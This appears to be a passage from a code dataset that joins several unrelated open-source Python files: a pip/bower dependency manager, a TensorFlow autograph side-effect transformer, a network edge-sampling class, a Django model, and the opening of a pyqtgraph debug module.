*path*, and *excinfo*. For more information, see the :mod:`atexit`
documentation.
"""
path = tempfile.mkdtemp(suffix=suffix, prefix=prefix, dir=dir)
if cleanup:
if on_cleanup_error is None:
def on_cleanup_error(function, path, excinfo):
click.secho("warning: failed to remove file or directory: {}\n"
"please delete it manually.".format(path),
fg="red")
atexit.register(shutil.rmtree, path=path, onerror=on_cleanup_error)
return path
class Requirement(object):
"""Represents a single package requirement.
.. note::
This class overrides `__hash__` in order to ensure that package
names remain unique when in a set.
.. todo::
Extend :class:`pkg_resources.Requirement` for Python requirements.
"""
# TODO: support multiple version specs (e.g. >=1.0,<=2.0)
spec_regex = r"(.+?)\s*(?:([<>~=]?=)\s*(.+?))?$"
def __init__(self, package, version):
"""Construct a new requirement.
:param package: the package name.
:param version: a semver compatible version specification.
"""
self.package = package
self.version = version
if self.version and not re.match(r"[<=>~]", version[:2]):
self.version = "=={}".format(self.version)
@classmethod
def coerce(cls, string):
"""Create a :class:`Requirement` object from a given package spec."""
match = re.match(cls.spec_regex, string)
if not match:
raise InvalidRequirementSpecError("could not parse requirement")
package = match.group(1)
if all(match.group(2, 3)):
version = "".join(match.group(2, 3))
else:
version = None
return cls(package, version)
def load_installed_version(self):
installed_packages = get_installed_pypackages()
if self.package in installed_packages:
self.version = "=={}".format(
installed_packages[self.package].version)
def __eq__(self, other):
return (isinstance(other, self.__class__) and
other.package == self.package)
def __hash__(self):
return hash(self.package)
def __str__(self):
return "".join([self.package, self.version or ""])
def __repr__(self):
return "<Requirement(package={package}, version='{version}')>".format(
package=self.package, version=self.version)
class Requirements(set):
"""Represents a set of requirements."""
def __init__(self, filename=None):
self.filename = None
if filename:
self.load(filename)
def add(self, elem, replace=False):
"""Add a requirement.
:param elem: a string or :class:`Requirement` instance.
:param replace: if `True`, packages in the set with the same name will
be removed first.
"""
if isinstance(elem, text_type):
elem = Requirement.coerce(elem)
if replace and elem in self:
self.remove(elem)
super(Requirements, self).add(elem)
def load(self, requirements_file=None):
"""Load or reload requirements from a requirements.txt file.
:param requirements_file: if not given, the filename used from
initialization will be read again.
"""
if requirements_file is None:
requirements_file = self.filename
if requirements_file is None:
raise ValueError("no filename provided")
elif isinstance(requirements_file, text_type):
requirements_file = Path(requirements_file)
self.clear()
with requirements_file.open() as f:
self.loads(f.read())
if isinstance(requirements_file, (text_type, Path)):
self.filename = requirements_file
def loads(self, requirements_text):
lines = re.findall(Requirement.spec_regex,
requirements_text,
re.MULTILINE)
for line in lines:
self.add(Requirement(line[0], "".join(line[1:])))
def remove(self, elem):
"""Remove a requirement.
:param elem: a string or :class:`Requirement` instance.
"""
if isinstance(elem, text_type):
for requirement in self:
if requirement.package == elem:
return super(Requirements, self).remove(requirement)
return super(Requirements, self).remove(elem)
def __str__(self):
return "\n".join([str(x) for x in self])
def __repr__(self):
return "<Requirements({})>".format(self.filename.name or "")
class NamedRequirements(Requirements):
def __init__(self, name, filename=None):
self.name = name
super(NamedRequirements, self).__init__(filename=filename)
def __repr__(self):
return "<NamedRequirements({}{})>".format(
self.name,
", filename='{}'".format(self.filename.name) if self.filename
else "")
class GroupedRequirements(defaultdict):
default_groups = ["all", "dev", "bower", "bower-dev"]
default_pip_files = {
"all": "requirements.txt",
"dev": "dev-requirements.txt"
}
def __init__(self, groups=None):
super(GroupedRequirements, self).__init__(NamedRequirements)
self.groups = groups or self.default_groups
self.filename = None
self.create_default_groups()
def clear(self):
super(GroupedRequirements, self).clear()
self.create_default_groups()
def create_default_groups(self):
for group in self.groups:
group = group.replace(" ", "_").lower()
self[group] = NamedRequirements(group)
def load_pip_requirements(self, files_map=None, freeze=True):
if files_map is None:
files_map = self.default_pip_files
for group, requirements_txt in files_map.items():
path = Path(requirements_txt)
if not path.exists() and group.lower() == "all" and freeze:
cmd = envoy.run("pip freeze")
self[group].loads(cmd.std_out)
elif path.exists():
self[group].load(path)
def load(self, filename, create_if_missing=True):
filename = Path(filename)
if not filename.exists() and create_if_missing:
self.load_pip_requirements()
with filename.open("w") as f:
f.write(yaml.dump(self.serialized, default_flow_style=False,
encoding=None))
self.filename = filename
return self.save(filename)
with filename.open() as f:
for group, requirements in yaml.load(f.read()).items():
for requirement in requirements:
self[group].add(Requirement.coerce(requirement))
self.filename = filename
def save(self, filename=None):
filename = Path(filename) if filename is not None else self.filename
with filename.open("w") as f:
f.write(self.yaml)
@property
def serialized(self):
to_ret = {}
for group, requirements in self.items():
to_ret[group] = [str(requirement) for requirement in requirements]
return to_ret
@property
def yaml(self):
return yaml.dump(self.serialized, default_flow_style=False,
encoding=None)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
else:
ret = self[key] = self.default_factory(name=key)
return ret
class Bower(object):
bower_base_uri = "https://bower.herokuapp.com"
@classmethod
def get_package_url(cls, package, session=None, silent=False):
response = get("{}/packages/{}".format(cls.bower_base_uri, package))
return response.json().get("url", None)
@classmethod
def clean_semver(cls, version_spec):
return re.sub(r"([<>=~])\s+?v?", "\\1", version_spec, re.IGNORECASE)
class Hydrogen(object):
def __init__(self, assets_dir=None, requirements_file="requirements.yml"):
self.assets_dir = assets_dir or Path(".") / "assets"
self.requirements = GroupedRequirements()
self.requirements.load(requirements_file)
self.temp_dir = mkdtemp()
def extract_bower_zipfile(self, zip_file, dest, expected_version=None):
bower_json = None
root = None
deps_installed = []
for info in zip_file.infolist():
if PurePath(info.filename).name == "bower.json":
with zip_file.open(info) as f:
bower_json = json.load(f)
root = str(PurePath(info.filename).parent)
break
version = bower_json["version"]
if expected_version is not None:
expected_version = Bower.clean_semver(expected_version)
if not semver.match(version, expected_version):
click.secho("error: versions do not match ({} =/= {})".format(
version, expected_version))
raise InvalidPackageError
if "dependencies" in bower_json:
for package, version in bower_json["dependencies"].items():
url = Bower.get_package_url(package)
deps_installed.extend(self.get_bower_package(
url, dest=dest, version=version))
ignore_patterns = [GitIgnorePattern(ig) for ig in bower_json["ignore"]]
path_spec = PathSpec(ignore_patterns)
namelist = [path for path in zip_file.namelist()
if PurePath(path).parts[0] == root]
ignored = list(path_spec.match_files(namelist))
for path in namelist:
dest_path = PurePath(
bower_json["name"],
*PurePath(path).parts[1:])
if path in ignored:
continue
for path in ignored:
for parent in PurePath(path):
if parent in ignored:
continue
if path.endswith("/"):
if list(path_spec.match_files([str(dest_path)])):
ignored.append(PurePath(path))
elif not (dest / dest_path).is_dir():
(dest / dest_path).mkdir(parents=True)
else:
target_path = dest / dest_path.parent / dest_path.name
source = zip_file.open(path)
target = target_path.open("wb")
with source, target:
shutil.copyfileobj(source, target)
deps_installed.append((bower_json["name"], bower_json["version"]))
return deps_installed
def get_bower_package(self, url, dest=None, version=None,
process_deps=True):
dest = dest or Path(".") / "assets"
parsed_url = urlparse(url)
if parsed_url.scheme == "git" or parsed_url.path.endswith(".git"):
if parsed_url.netloc == "github.com":
user, repo = parsed_url.path[1:-4].split("/")
response = get(github_api_uri +
"/repos/{}/{}/tags".format(user, repo))
tags = response.json()
target = None
if not len(tags):
click.secho("fatal: no tags exist for {}/{}".format(
user, repo), fg="red")
raise InvalidPackageError
if version is None:
target = tags[0]
else:
for tag in tags:
if semver.match(tag["name"],
Bower.clean_semver(version)):
target = tag
break
if not target:
click.secho(
"fatal: failed to find matching tag for "
"{user}/{repo} {version}".format(user, repo, version),
fg="red")
raise VersionNotFoundError
click.secho("installing {}/{}#{}".format(
user, repo, tags[0]["name"]), fg="green")
return self.get_bower_package(
url=target["zipball_url"],
dest=dest,
version=version)
raise NotImplementedError
click.echo("git clone {url}".format(url=url))
cmd = envoy.run('git clone {url} "{dest}"'.format(
url=url, dest=dest))
elif parsed_url.scheme in ("http", "https"):
zip_dest = download_file(url, dest=self.temp_dir,
label="{dest_basename}",
expected_extension="zip")
with zipfile.ZipFile(zip_dest, "r") as pkg:
return self.extract_bower_zipfile(pkg, dest,
expected_version=version)
# pkg.extractall(str(dest))
else:
click.secho("protocol currently unsupported :(")
sys.exit(1)
def install_bower(self, package, save=True, save_dev=False):
"""Installs a bower package.
:param save: if `True`, pins the package to the Hydrogen requirements
YAML file.
:param save_dev: if `True`, pins the package as a development
dependency to the Hydrogen requirements YAML file.
:param return: a list of tuples, containing all installed package names
and versions, including any dependencies.
"""
requirement = Requirement.coerce(package)
url = Bower.get_package_url(requirement.package)
installed = []
for name, _ in self.get_bower_package(url):
installed.append(Requirement(name, requirement.version))
for requirement in installed:
if save:
self.requirements["bower"].add(requirement, replace=True)
if save_dev:
self.requirements["bower-dev"].add(requirement, replace=True)
success("installed {}".format(str(requirement)))
if save or save_dev:
self.requirements.save()
return installed
def install_pip(self, package, save=True, save_dev=False):
"""Installs a pip package.
:param save: if `True`, pins the package to the Hydrogen requirements
YAML file.
:param save_dev: if `True`, pins the package as a development
dependency to the Hydrogen requirements YAML file.
:param return: a **single** :class:`Requirement` object, representing
the installed version of the given package.
"""
requirement = Requirement.coerce(package)
click.echo("pip install " + requirement.package)
cmd = envoy.run("pip install {}".format(str(requirement)))
if cmd.status_code == 0:
installed_packages = get_installed_pypackages()
package = installed_packages[requirement.package]
requirement.version = "=={}".format(package.version)
if save:
self.requirements["all"].add(requirement)
if save_dev:
self.requirements["dev"].add(requirement)
if save or save_dev:
self.requirements.save()
return requirement
else:
fatal(cmd.std_err)
def groups_option(f):
new_func = click.option("-g", "--groups",
help="Comma-separated list of requirement groups "
"to include.")(f)
return update_wrapper(new_func, f)
@click.group()
@click.version_option(prog_name=prog_name)
@click.pass_context
def main(ctx):
which = "where" if sys.platform == "win32" else "which"
if envoy.run(which + " git").status_code != 0:
click.secho("fatal: git not found in PATH", fg="red")
sys.exit(1)
ctx.obj = Hydrogen()
@main.command()
@click.pass_obj
@click.option("output_yaml", "--yaml", "-y", is_flag=True,
help="Show requirements in YAML format.")
@click.option("--resolve", "-r", is_flag=True,
help="Resolve version numbers for ambiguous packages.")
@groups_option
def freeze(h, output_yaml, resolve, groups):
"""Output installed packages."""
if not groups:
groups = filter(lambda group: not group.lower().startswith("bower"),
h.requirements.keys())
else:
groups = [text_type.strip(group) for group in groups.split(",")]
if output_yaml:
for requirements in h.requirements.values():
for requirement in requirements:
if resolve and not requirement.version:
requirement.load_installed_version()
click.echo(h.requirements.yaml)
else:
for group in groups:
if not h.requirements[group]:
continue
click.echo("# {}".format(group))
for requirement in h.requirements[group]:
if resolve and not requirement.version:
requirement.load_installed_version()
click.echo(str(requirement))
@main.command()
@click.pass_obj
@click.option("--pip/--bower", default=True)
@groups_option
@click.option("--save", is_flag=True)
@click.option("--save-dev", is_flag=True)
@click.argument("packages", nargs=-1)
def install(h, pip, groups, save, save_dev, packages):
"""Install a pip or bower package."""
if groups:
groups = [text_type.strip(group) for group in groups.split(",")]
else:
groups = h.requirements.keys()
if not packages:
for group in groups:
if group not in h.requirements:
warning("{} not in requirements".format(group))
continue
install = (h.install_bower if group.startswith("bower")
else h.install_pip)
for requirement in h.requirements[group]:
install(str(requirement), save=False, save_dev=False)
if pip:
for package in packages:
h.install_pip(package, save=save, save_dev=save_dev)
else:
for package in packages:
h.install_bower(package, save=save, save_dev=save_dev)
if __name__ == "__main__":
main()
|
darvid/hydrogen
|
hydrogen.py
|
Python
|
bsd-2-clause
| 26,677
| 0
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adds guards against function calls with side effects.
Only standalone calls are guarded.
WARNING: This mechanism is incomplete. Particularly, it only guards the
arguments passed to functions, and does not account for indirectly modified
state.
Example:
y = tf.layers.dense(x) # Creates TF variable 'foo'
loss = loss(y)
opt.minimize(loss) # indirectly affects 'foo'
z = tf.get_variable('foo') # Indirectly affects `loss` and 'foo'
# Here, `loss` can be guarded. But `z` cannot.
# TODO(mdan): We should probably define a safe mode where we guard everything.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.autograph.pyct import anno
from tensorflow.contrib.autograph.pyct import ast_util
from tensorflow.contrib.autograph.pyct import qual_names
from tensorflow.contrib.autograph.pyct import templates
from tensorflow.contrib.autograph.pyct import transformer
from tensorflow.contrib.autograph.pyct.static_analysis.annos import NodeAnno
class SymbolNamer(object):
"""Describes the interface for SideEffectGuardTransformer's namer."""
def new_symbol(self, name_root, reserved_locals):
"""Generate a new unique function_name.
Args:
name_root: String, used as stem in the new name.
reserved_locals: Set(string), additional local symbols that are reserved.
Returns:
String.
"""
raise NotImplementedError()
class SideEffectGuardTransformer(transformer.Base):
"""Adds control dependencies to functions with side effects."""
def __init__(self, context):
super(SideEffectGuardTransformer, self).__init__(context)
# pylint:disable=invalid-name
def _visit_and_reindent(self, nodes):
new_nodes = []
current_dest = new_nodes
alias_map = {}
reindent_requested = False
for n in nodes:
n = self.visit(n)
# NOTE: the order in which these statements execute is important; in
# particular, watch out for ending up with cycles in the AST.
if alias_map:
n = ast_util.rename_symbols(n, alias_map)
if isinstance(n, (list, tuple)):
current_dest.extend(n)
else:
current_dest.append(n)
if anno.hasanno(n, anno.Basic.INDENT_BLOCK_REMAINDER):
reindent_requested = True
new_dest, new_alias_map = anno.getanno(
n, anno.Basic.INDENT_BLOCK_REMAINDER)
anno.delanno(n, anno.Basic.INDENT_BLOCK_REMAINDER)
new_alias_map.update(alias_map)
alias_map = new_alias_map
current_dest = new_dest
if reindent_requested and not current_dest:
# TODO(mdan): There may still be something that could be done.
raise ValueError('Unable to insert statement into the computation flow: '
'it is not followed by any computation which '
'the statement could gate.')
return new_nodes
def visit_FunctionDef(self, node):
node.body = self._visit_and_reindent(node.body)
return node
def visit_With(self, node):
node.body = self._visit_and_reindent(node.body)
return node
def visit_If(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_While(self, node):
node.body = self._visit_and_reindent(node.body)
node.orelse = self._visit_and_reindent(node.orelse)
return node
def visit_Expr(self, node):
self.generic_visit(node)
if isinstance(node.value, gast.Call):
# Patterns of single function calls, like:
# opt.minimize(loss)
# or:
# tf.py_func(...)
# First, attempt to gate future evaluation of args. If that's not
# possible, gate all remaining statements (and that may fail too, see
# _visit_and_reindent.
args_scope = anno.getanno(node.value, NodeAnno.ARGS_SCOPE)
# NOTE: We can't guard object attributes because they may not be writable.
# In addition, avoid renaming well-known names.
# TODO(mdan): Move these names into config.
unguarded_names = (qual_names.QN('self'), qual_names.QN('tf'))
guarded_args = tuple(s for s in args_scope.used
if not s.is_composite() and s not in unguarded_names)
# TODO(mdan): Include all arguments which depended on guarded_args too.
# For example, the following will still cause a race:
# tf.assign(a, a + 1)
# b = a + 1
# tf.assign(a, a + 1) # Control deps here should include `b`
# c = b + 1
# Or maybe we should just raise an "unsafe assign" error?
if guarded_args:
# The aliases may need new names to avoid incorrectly making them local.
# TODO(mdan): This is brutal. It will even rename modules - any fix?
need_alias = tuple(
s for s in guarded_args if s not in args_scope.parent.modified)
aliased_new_names = tuple(
qual_names.QN(
self.context.namer.new_symbol(
s.ssf(), args_scope.parent.referenced)) for s in need_alias)
alias_map = dict(zip(need_alias, aliased_new_names))
if len(guarded_args) == 1:
s, = guarded_args
aliased_guarded_args = alias_map.get(s, s)
else:
aliased_guarded_args = gast.Tuple(
[alias_map.get(s, s).ast() for s in guarded_args], None)
template = """
with ag__.utils.control_dependency_on_returns(call):
aliased_guarded_args = ag__.utils.alias_tensors(guarded_args)
"""
control_deps_guard = templates.replace(
template,
call=node.value,
aliased_guarded_args=aliased_guarded_args,
guarded_args=guarded_args)[-1]
else:
alias_map = {}
template = """
with ag__.utils.control_dependency_on_returns(call):
pass
"""
control_deps_guard = templates.replace(template, call=node.value)[-1]
control_deps_guard.body = []
node = control_deps_guard
anno.setanno(node, anno.Basic.INDENT_BLOCK_REMAINDER,
(node.body, alias_map))
return node
# pylint:enable=invalid-name
def transform(node, context):
return SideEffectGuardTransformer(context).visit(node)
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/converters/side_effect_guards.py
|
Python
|
apache-2.0
| 7,026
| 0.007543
|
import random
from sets import Set
class Network(object):
"""
Network class represents the whole graph that we read from the
data file. Since we store all the edges ONLY, the size of this
information is much smaller due to the graph sparsity (in general,
around 0.1% of links are connected)
We use the term "linked edges" to denote the edges that two nodes
are connected, "non linked edges", otherwise. If we just say edge,
it means either linked or non-link edge.
The class also contains lots of sampling methods that sampler can utilize.
This is great separation between different learners and data layer. By calling
the function within this class, each learner can get different types of
data.
"""
def __init__(self, data, held_out_ratio):
"""
In this initialization step, we separate the whole data set
into training, validation and testing sets. Basically,
Training -> used for tuning the parameters.
Held-out/Validation -> used for evaluating the current model, avoid over-fitting
, the accuracy for validation set used as stopping criteria
Testing -> used for calculating final model accuracy.
Arguments:
data: representation of the while graph.
vlaidation_ratio: the percentage of data used for validation and testing.
"""
self.__N = data.N # number of nodes in the graph
self.__linked_edges = data.E # all pair of linked edges.
self.__num_total_edges = len(self.__linked_edges) # number of total edges.
self.__held_out_ratio = held_out_ratio # percentage of held-out data size
# Based on the a-MMSB paper, it samples equal number of
# linked edges and non-linked edges.
self.__held_out_size = int(held_out_ratio * len(self.__linked_edges))
# it is used for stratified random node sampling. By default 10
self.__num_pieces = 10
# The map stores all the neighboring nodes for each node, within the training
# set. The purpose of keeping this object is to make the stratified sampling
# process easier, in which case we need to sample all the neighboring nodes
# given the current one. The object looks like this:
# {
# 0: [1,3,1000,4000]
# 1: [0,4,999]
# .............
# 10000: [0,441,9000]
# }
self.__train_link_map = {}
self.__held_out_map = {} # store all held out edges
self.__test_map = {} # store all test edges
# initialize train_link_map
self.__init_train_link_map()
# randomly sample hold-out and test sets.
self.__init_held_out_set()
self.__init_test_set()
def sample_mini_batch(self, mini_batch_size, strategy):
"""
Sample a mini-batch of edges from the training data.
There are four different sampling strategies for edge sampling
1.random-pair sampling
sample node pairs uniformly at random.This method is an instance of independent
pair sampling, with h(x) equal to 1/(N(N-1)/2) * mini_batch_size
2.random-node sampling
A set consists of all the pairs that involve one of the N nodes: we first sample one of
the node from N nodes, and sample all the edges for that node. h(x) = 1/N
3.stratified-random-pair sampling
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linked edges. g(x) = 1/N_0 for non-link and
1/N_1 for link, where N_0-> number of non-linked edges, N_1-> # of linked edges.
4.stratified-random-node sampling
For each node, we define a link set consisting of all its linkes, and m non-link sets
that partition its non-links. We first selct a random node, and either select its link
set or sample one of its m non-link sets. h(x) = 1/N if linked set, 1/Nm otherwise
Returns (sampled_edges, scale)
scale equals to 1/h(x), insuring the sampling gives the unbiased gradients.
"""
if strategy == "random-pair":
return self.__random_pair_sampling(mini_batch_size)
elif strategy == "random-node":
return self.__random_node_sampling()
elif strategy == "stratified-random-pair":
return self.__stratified_random_pair_sampling(mini_batch_size)
elif strategy == "stratified-random-node":
return self.__stratified_random_node_sampling(10)
else:
print "Invalid sampling strategy, please make sure you are using the correct one:\
[random-pair, random-node, stratified-random-pair, stratified-random-node]"
return None
def get_num_linked_edges(self):
return len(self.__linked_edges)
def get_num_total_edges(self):
return self.__num_total_edges
def get_num_nodes(self):
return self.__N
def get_linked_edges(self):
return self.__linked_edges
def get_held_out_set(self):
return self.__held_out_map
def get_test_set(self):
return self.__test_map
def set_num_pieces(self, num_pieces):
self.__num_pieces = num_pieces
def __random_pair_sampling(self, mini_batch_size):
"""
sample list of edges from the whole training network uniformly, regardless
of links or non-links edges.The sampling approach is pretty simple: randomly generate
one edge and then check if that edge passes the conditions. The iteration
stops until we get enough (mini_batch_size) edges.
"""
p = mini_batch_size
mini_batch_set = Set() # list of samples in the mini-batch
# iterate until we get $p$ valid edges.
while p > 0:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if firstIdx == secondIdx:
continue
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# the edge should not be in 1)hold_out set, 2)test_set 3) mini_batch_set (avoid duplicate)
if edge in self.__held_out_map or edge in self.__test_map or edge in mini_batch_set:
continue
# great, we put it into the mini_batch list.
mini_batch_set.add(edge)
p -= 1
scale = (self.__N*(self.__N-1)/2)/mini_batch_size
return (mini_batch_set, scale)
def __random_node_sampling(self):
"""
A set consists of all the pairs that involve one of the N nodes: we first sample one of
the node from N nodes, and sample all the edges for that node. h(x) = 1/N
"""
mini_batch_set = Set()
# randomly select the node ID
nodeId = random.randint(0, self.__N-1)
for i in range(0, self.__N):
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(nodeId, i), max(nodeId, i))
if edge in self.__held_out_map or edge in self.__test_map \
or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
return (mini_batch_set, self.__N)
def __stratified_random_pair_sampling(self, mini_batch_size):
"""
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linked edges. g(x) = 1/N_0 for non-link and
1/N_1 for link, where N_0-> number of non-linked edges, N_1-> # of linked edges.
"""
p = mini_batch_size
mini_batch_set = Set()
flag = random.randint(0,1)
if flag == 0:
""" sample mini-batch from linked edges """
while p > 0:
sampled_linked_edges = random.sample(self.__linked_edges, mini_batch_size * 2)
for edge in sampled_linked_edges:
if p < 0:
break
if edge in self.__held_out_map or edge in self.__test_map or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
p -= 1
return (mini_batch_set, len(self.__linked_edges)/mini_batch_size)
else:
""" sample mini-batch from non-linked edges """
while p > 0:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if (firstIdx == secondIdx):
continue
# ensure the first index is smaller than the second one.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# check conditions:
if edge in self.__linked_edges or edge in self.__held_out_map \
or edge in self.__test_map or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
p -= 1
return (mini_batch_set, ((self.__N*(self.__N-1))/2 - len(self.__linked_edges)/mini_batch_size))
def __stratified_random_node_sampling(self, num_pieces):
"""
stratified sampling approach gives more attention to link edges (the edge is connected by two
nodes). The sampling process works like this:
a) randomly choose one node $i$ from all nodes (1,....N)
b) decide to choose link edges or non-link edges with (50%, 50%) probability.
c) if we decide to sample link edge:
return all the link edges for the chosen node $i$
else
sample edges from all non-links edges for node $i$. The number of edges
we sample equals to number of all non-link edges / num_pieces
"""
# randomly select the node ID
nodeId = random.randint(0, self.__N-1)
# decide to sample links or non-links
flag = random.randint(0,1) # flag=0: non-link edges flag=1: link edges
mini_batch_set = Set()
if flag == 0:
""" sample non-link edges """
# this is approximation, since the size of self.train_link_map[nodeId]
# greatly smaller than N.
mini_batch_size = int(self.__N/self.__num_pieces)
p = mini_batch_size
while p > 0:
# because of the sparsity, when we sample $mini_batch_size*2$ nodes, the list likely
# contains at least mini_batch_size valid nodes.
nodeList = random.sample(list(xrange(self.__N)), mini_batch_size * 2)
for neighborId in nodeList:
if p < 0:
break
if neighborId == nodeId:
continue
# check condition, and insert into mini_batch_set if it is valid.
edge = (min(nodeId, neighborId), max(nodeId, neighborId))
if edge in self.__linked_edges or edge in self.__held_out_map or \
edge in self.__test_map or edge in mini_batch_set:
continue
# add it into mini_batch_set
mini_batch_set.add(edge)
p -= 1
return (mini_batch_set, self.__N * self.__num_pieces)
else:
""" sample linked edges """
# return all linked edges
for neighborId in self.__train_link_map[nodeId]:
mini_batch_set.add((min(nodeId, neighborId),max(nodeId, neighborId)))
return (mini_batch_set, self.__N)
def __init_train_link_map(self):
"""
create a set for each node, which contains list of
neighborhood nodes. i.e {0: Set[2,3,4], 1: Set[3,5,6]...}
This is used for sub-sampling
in the later.
"""
for i in range(0, self.__N):
self.__train_link_map[i] = Set()
for edge in self.__linked_edges:
self.__train_link_map[edge[0]].add(edge[1])
self.__train_link_map[edge[1]].add(edge[0])
def __init_held_out_set(self):
"""
Sample held out set. we draw equal number of
links and non-links from the whole graph.
"""
p = self.__held_out_size/2
# Sample p linked-edges from the network.
if len(self.__linked_edges) < p:
print "There are not enough linked edges that can sample from. \
please use smaller held out ratio."
sampled_linked_edges = random.sample(self.__linked_edges, p)
for edge in sampled_linked_edges:
self.__held_out_map[edge] = True
self.__train_link_map[edge[0]].remove(edge[1])
self.__train_link_map[edge[1]].remove(edge[0])
# sample p non-linked edges from the network
while p > 0:
edge = self.__sample_non_link_edge_for_held_out()
self.__held_out_map[edge] = False
p -= 1
def __init_test_set(self):
"""
sample test set. we draw equal number of samples for
linked and non-linked edges
"""
p = int(self.__held_out_size/2)
# sample p linked edges from the network
while p > 0:
# Because we already used some of the linked edges for held_out sets,
# here we sample twice as much as links, and select among them, which
# is likely to contain valid p linked edges.
sampled_linked_edges = random.sample(self.__linked_edges, 2*p)
for edge in sampled_linked_edges:
if p < 0:
break
# check whether it is already used in hold_out set
if edge in self.__held_out_map or edge in self.__test_map:
continue
else:
self.__test_map[edge] = True
self.__train_link_map[edge[0]].remove(edge[1])
self.__train_link_map[edge[1]].remove(edge[0])
p -= 1
# sample p non-linked edges from the network
p = int(self.__held_out_size/2)
while p > 0:
edge = self.__sample_non_link_edge_for_test()
self.__test_map[edge] = False
p -= 1
def __sample_non_link_edge_for_held_out(self):
'''
sample one non-link edge for held out set from the network. We should make sure the edge is not
been used already, so we need to check the condition before we add it into
held out sets
TODO: add condition for checking the infinit-loop
'''
while True:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if (firstIdx == secondIdx):
continue
# ensure the first index is smaller than the second one.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# check conditions.
if edge in self.__linked_edges or edge in self.__held_out_map:
continue
return edge
def __sample_non_link_edge_for_test(self):
"""
Sample one non-link edge for test set from the network. We first randomly generate one
edge, then check conditions. If that edge passes all the conditions, return that edge.
TODO prevent the infinit loop
"""
while True:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if (firstIdx == secondIdx):
continue
# ensure the first index is smaller than the second one.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# check conditions:
if edge in self.__linked_edges or edge in self.__held_out_map \
or edge in self.__test_map:
continue
return edge
|
wenzheli/python_new
|
com/uva/network.py
|
Python
|
gpl-3.0
| 17,149
| 0.012595
|
# -*- coding: utf-8 -*-
from django.db import models
from apps.postitulos.models.EstadoPostitulo import EstadoPostitulo
from apps.postitulos.models.TipoPostitulo import TipoPostitulo
from apps.postitulos.models.PostituloTipoNormativa import PostituloTipoNormativa
from apps.postitulos.models.CarreraPostitulo import CarreraPostitulo
from apps.postitulos.models.AreaPostitulo import AreaPostitulo
from apps.registro.models.Nivel import Nivel
from apps.registro.models.Jurisdiccion import Jurisdiccion
import datetime
"""
Título nomenclado nacional
"""
class Postitulo(models.Model):
nombre = models.CharField(max_length=255)
tipo_normativa = models.ForeignKey(PostituloTipoNormativa)
normativa = models.CharField(max_length=50)
carrera_postitulo = models.ForeignKey(CarreraPostitulo)
observaciones = models.CharField(max_length=255, null=True, blank=True)
niveles = models.ManyToManyField(Nivel, db_table='postitulos_postitulos_niveles')
areas = models.ManyToManyField(AreaPostitulo, db_table='postitulos_postitulos_areas')
jurisdicciones = models.ManyToManyField(Jurisdiccion, db_table='postitulos_postitulos_jurisdicciones') # Provincias
estado = models.ForeignKey(EstadoPostitulo) # Concuerda con el último estado en TituloEstado
class Meta:
app_label = 'postitulos'
ordering = ['nombre']
def __unicode__(self):
return self.nombre
"Sobreescribo el init para agregarle propiedades"
def __init__(self, *args, **kwargs):
super(Postitulo, self).__init__(*args, **kwargs)
self.estados = self.getEstados()
def registrar_estado(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
registro = PostituloEstado(estado = self.estado)
registro.fecha = datetime.date.today()
registro.postitulo_id = self.id
registro.save()
def getEstados(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
try:
estados = PostituloEstado.objects.filter(postitulo = self).order_by('fecha', 'id')
except:
estados = {}
return estados
"Algún título jurisdiccional está asociado al título?"
def asociado_carrera_postitulo_jurisdiccional(self):
from apps.postitulos.models.CarreraPostituloJurisdiccional import CarreraPostituloJurisdiccional
return CarreraPostituloJurisdiccional.objects.filter(postitulo = self).exists()
|
MERegistro/meregistro
|
meregistro/apps/postitulos/models/Postitulo.py
|
Python
|
bsd-3-clause
| 2,464
| 0.007323
|
# -*- coding: utf-8 -*-
"""
debug.py - Functions to aid in debugging
Copyright 2010 Luke Campagnola
Distributed under MIT/X11 license. See license.txt for more information.
"""
from __future__ import print_function
import sys, traceback, time, gc, re, types, weakref, inspect, os, cProfile, threading
from . import ptime
from numpy import ndarray
from .Qt import QtCore, QtGui
from .util.mutex import Mutex
from .util import cprint
__ftraceDepth = 0
def ftrace(func):
"""Decorator used for marking the beginning and end of function calls.
Automatically indents nested calls.
"""
def w(*args, **kargs):
global __ftraceDepth
pfx = " " * __ftraceDepth
print(pfx + func.__name__ + " start")
__ftraceDepth += 1
try:
rv = func(*args, **kargs)
finally:
__ftraceDepth -= 1
print(pfx + func.__name__ + " done")
return rv
return w
class Tracer(object):
"""
Prints every function enter/exit. Useful for debugging crashes / lockups.
"""
def __init__(self):
self.count = 0
self.stack = []
def trace(self, frame, event, arg):
self.count += 1
# If it has been a long time since we saw the top of the stack,
# print a reminder
if self.count % 1000 == 0:
print("----- current stack: -----")
for line in self.stack:
print(line)
if event == 'call':
line = " " * len(self.stack) + ">> " + self.frameInfo(frame)
print(line)
